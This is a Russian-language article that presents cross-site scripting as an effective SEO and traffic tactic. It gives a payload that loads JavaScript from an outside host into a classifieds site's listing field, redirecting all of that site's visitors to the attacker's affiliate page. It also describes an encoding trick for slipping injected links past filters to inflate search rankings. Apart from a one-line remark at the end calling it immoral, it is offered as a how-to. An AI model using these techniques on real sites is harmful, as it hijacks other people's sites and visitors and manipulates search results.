Самых высоких результатов в раскрутке можно добиться, если использовать непопулярные и нестандартные методы, одним из которых является XSS. Что это такое? XSS – это межсайтовый скриптинг (от англ. cross site scripting). Первая буква в аббревиатуре заменена, чтобы не было путаницы с CSS. XSS – это написание скриптов, позволяющих внедрять на страницы чужого сайта свой код. Таким кодом может быть все, что угодно: размещение своего баннера на страницах чужого сайта, редирект на JS, размещение своих ссылок и т. п. XSS часто используется в SEO, позволяя оптимизаторам получать дополнительные ссылки на свои сайты.

Как это работает? Дело в том, что большинство сайтов создается вебмастерами, владеющими лишь азами программирования, а их недостаточно, чтобы создавать безопасные сайты. Продемонстрирую на примере.

Допустим, что сайт www.example1.ru представляет собой доску объявлений, новые поступления которых транслируются на главной странице. Форма подачи объявления имеет несколько полей, самое объемное из которых (текст объявления) защищено с помощью PHP-функции htmlspecialchars, а значение одного из других полей ввода проверяется лишь на длину, т. е. внедрить мало-мальски серьезный код на JavaScript мы не можем – он будет обрезан. Но и здесь возможен XSS. Решить проблему можно таким образом: создаем файл, содержащий наш JavaScript-код на любом другом сайте, н-р:

<!-- www.example2.narod.ru/code.js -->
window.location ='http://www.example3.ru/';

Понятно, что код может быть произвольным, а редирект на www.example3.ru указан лишь для примера. Все, что требуется для работы данного скрипта на сайте-жертве – это внедрение небольшого кода на его страницы:

<script src=http://www.example2.narod.ru/code.js></script>

Результатом подачи такого «объявления» будет редирект всех посетителей сайта-жертвы на наш www.example3.ru, который может являться, например PPC-партнеркой. Минусы использования такого XSS очевидны – если вебмастер следит за своим сайтом, то быстро удалит ваш код, но не стоит переоценивать таких сайтостроителей – очень часто вполне посещаемые сайты брошены на произвол судьбы.

Другая цель использования XSS – увеличение PageRank и тИЦ сетевых ресурсов, т. е. в SEO. Многие сайты позволяют пользователям создавать новые страницы, например, страницы с результатами поиска по сайту. Робот поисковой системы не узнает ничего о такой странице, если не поставить на нее пару ссылок с проиндексированных документов. В таком случае, страница попадет в базу поисковой системы вместе со всеми своими ссылками. Единственная проблема – внедрение кода ссылки на страницу сайта-жертвы. Такой код: <a href='http://www.example3.ru'>example3</a>, скорее всего, не даст желаемого результата, т. к. код будет отфильтрован, а вот если попробовать ввести его в другой кодировке, срабатывает очень часто. Здесь может помочь программа "Штирлиц", использующаяся для просмотра документов в различных кодировках. После того, как мы получили страницу с нашей ссылкой, остается лишь сослаться на нее, и, когда роботы Яндекса найдут ее, у сайт www.example3.ru подрастут пузомерки.

Стоит отметить, что данные методы очень эффективны, но их использование в SEO аморально!